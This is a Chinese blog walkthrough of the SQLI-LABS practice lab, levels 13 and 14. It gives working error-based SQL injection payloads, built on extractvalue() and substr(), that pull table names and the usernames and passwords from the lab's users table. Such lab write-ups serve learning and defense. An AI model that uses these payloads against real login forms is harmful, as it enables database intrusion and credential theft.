SQLI-LABS Less-13 到 Less-14

已于 2023-04-03 17:58:45 修改
阅读量113 收藏
点赞数 1
分类专栏: SQLI-LABS 文章标签: web安全
于 2023-03-24 20:23:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73802738/article/details/129757923
版权

Less-13 到 Less-14 是报错注入

不能使用 union()函数,或者没有回显位

Less-13

闭合字符:('$uname') 或 ('$passwd')

判断闭合字符:

uname=username'&passwd=password&Submit=Submit
#报错,提示了 'password') LIMIT 0,1'
uname=username') or 1 #&passwd=password&Submit=Submit
#正确,确定了闭合字符

判断字段数:

uname=username') order by n #&passwd=password&Submit=Submit
#确定字段数为2

判断回显位:

uname=username') union select 1,2 #&passwd=password&Submit=Submit
#发现没有回显位,改用报错注入

查询当前数据库:

uname=username') and extractvalue(1,concat(0x7e,(select database()))) #&passwd=password&Submit=Submit

查询当前数据库的表:

uname=username') and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&passwd=password&Submit=Submit

查询当前表的字段:

uname=username') and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&passwd=password&Submit=Submit

查询数据:

uname=username') and extractvalue(1,concat(0x7e,(select group_concat(username,'@',password) from security.users))) #&passwd=password&Submit=Submit
# extractvalue() 和 updatexml() 最多输出32个位,数据没有输出完,借助 substr()

uname=username') and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&passwd=password&Submit=Submit

uname=username') and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),62,31))) #&passwd=password&Submit=Submit
...

# 0x7e 占了一位,所以一次只能查询得到31位

Less-14

跟 less-13 一样的注入手法

闭合字符:"$uname" 或 "$passwd"

uname=username" and extractvalue(1,concat(0x7e,(select database()))) #&passwd=password&Submit=Submit
#查询当前数据库

uname=username" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #&passwd=password&Submit=Submit
#查询当前数据库的表

uname=username" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #&passwd=password&Submit=Submit
#查询当前表的字段

uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #&passwd=password&Submit=Submit

uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #&passwd=password&Submit=Submit

uname=username" and extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),62,31))) #&passwd=password&Submit=Submit
...
#查询数据

gjasgdk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-13
qq_42630215的博客
03-27 127
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1 uname= ') union select count(*),c...
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 272
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
sqli-labs/Less-14
m0_71299382的博客
11-18 165
sqli-labs第十四关
sqli-labs (less-13)
kukudeshuo的博客
03-09 924
sqli-labs (less-13) 进入13,输入用户名和密码登入,利用hackbar抓取POST请求,但是这里我们发现屏幕上这次没有数据回显了,这也说明我们这里不能再使用union注入了 输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息 通过报错信息我们知道闭合方式为’),并且为字符型注入 因为这里没有数据回显,但是我们观察到有完整的错误信息,所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注 查看当前数据库
Sqlilabs Less-14
Light_inthe_eyes的博客
03-04 94
判断是双引号字符型注入,并且无回显,用报错注入: uname=admin"#&passwd=&submit=Submit 判断列数: uname=admin"+order+by+2#&passwd=&submit=Submit 爆库: uname=-admin"+and+updatexml(1,concat(0x5c,(select+database())),1)#&passwd=&submit=Submit 爆表: uname=admin"+and+u
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
最新发布
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs Less-14
qq_42630215的博客
03-28 313
Less-14 POST -Double Injection -Single quotes - String -with twist 与Less-13只有闭合方式不同,都是通过双注入来破解。基本步骤一致。 0x01. uname=1&passwd=1&submit=Submit uname=1"&passwd=1&submit=Submit You have ...
sqli labs less 14
Xiaoxiaoqiang_的博客
03-02 202
sql注入
sqli-labs ————less -14
Fly_鹏程万里
05-11 562
Less-14源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
sqli-lab-less14
Sa1nZen的博客
08-03 58
sqli-lab-less14。
sqli-labs-less-13、14、15、16
giun的博客
02-10 968
Less-13 输入username:admin’,密码随意 故 我们输入username:admin’)#,密码随意 只返回登录状态没有登录信息 所有我们可以使用盲注,这边使用布尔类型的盲注 猜数据库第一位 输入username:admin') and left (database(),1)>'a'# 密码随意 然后 用二分法一个个进行尝试就可以猜出数据库了,其他过程查看less-...
Sqli-labsLess-13和Less-14
m0_46315342的博客
06-04 200
                                          &nbs...
sqli-labs (less11-less14)
Xi4or0uji
07-29 1500
less 11 post方法单引号绕过报错注入 这关跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到 uname=1' union select 1,group...
[网络安全]sqli-labs Less-14 解题详析
等风来
07-24 2301
以上为[网络安全]sqli-labs Less-14 解题详析,后续将分享[网络安全]sqli-labs Less-15 解题详析我是秋说,我们下次见。
SQLi-LABS Less-13&&Less-14
m0_64898960的博客
04-21 254
Less-13题目 通过bp抓包修改进行测试,得知这次需要使用 ') 来闭合 尝试获取显示位失败 尝试报错注入,成功回显 查表 查列 查列里面的内容 Less-14题目 Less-14和Less-13一样,只不过还是在闭合的地方弄了点小手脚而已 所以这里新用一个姿势来进行注入 查表 查列 查列里面的内容 总结 floor报错注入套路 1" union select count(*),concat(database(),floor(rand(0)*2))x from informat
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值